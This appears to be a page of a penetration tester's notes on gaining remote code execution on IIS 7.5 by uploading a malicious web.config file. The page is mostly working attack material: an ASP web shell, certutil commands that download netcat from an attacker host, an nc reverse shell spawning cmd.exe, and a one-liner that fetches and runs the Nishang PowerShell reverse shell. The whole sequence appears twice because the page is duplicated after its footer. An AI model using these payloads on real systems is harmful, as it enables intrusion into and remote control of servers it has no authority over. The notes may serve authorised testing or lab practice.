IIS

IIS Versions

80 http Microsoft IIS httpd 7.5

IIS 7.5 = Windows 2008 R2

IIS Uploads

If you can upload to an IIS site, keep trying to see which extensions are allowed

test.txt        ..fail
test.asp        ..fail
test.aspx       ..fail
test.jpg        ..ok
web.config      ..ok - we can exploit

RCE webconfig upload

Old Version of IIS 7.5 that accepts fileuploads
We can transfer our 'web.config' that includes some evil-aspx at the bottom
https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
REF: RevWebShellsAsp

-------------------------------
vi web.config         ..evil asp code at bottom
Response.write(1+2)   ..test will equal 3

-------------------------------
cat /opt/shells/web.aspx

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>

-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config

-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp

Easy

-----------------------
We will use web.config exploit

First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")

Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo


-----------------------
google iis rce upload

Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")

0xdf wrote this easy one:
To download our Nishang reverse shell and execute it

prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>

PreviousHttpFileServer (HFS)NextIIS6 WebDav

Last updated 2 years ago

Was this helpful?

RCE webconfig upload

-------------------------------
vi web.config         ..evil asp code at bottom
Response.write(1+2)   ..test will equal 3

-------------------------------
cat /opt/shells/web.aspx

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>

-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config

-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp

Easy

-----------------------
We will use web.config exploit

First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")

Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo


-----------------------
google iis rce upload

Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")

0xdf wrote this easy one:
To download our Nishang reverse shell and execute it

prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>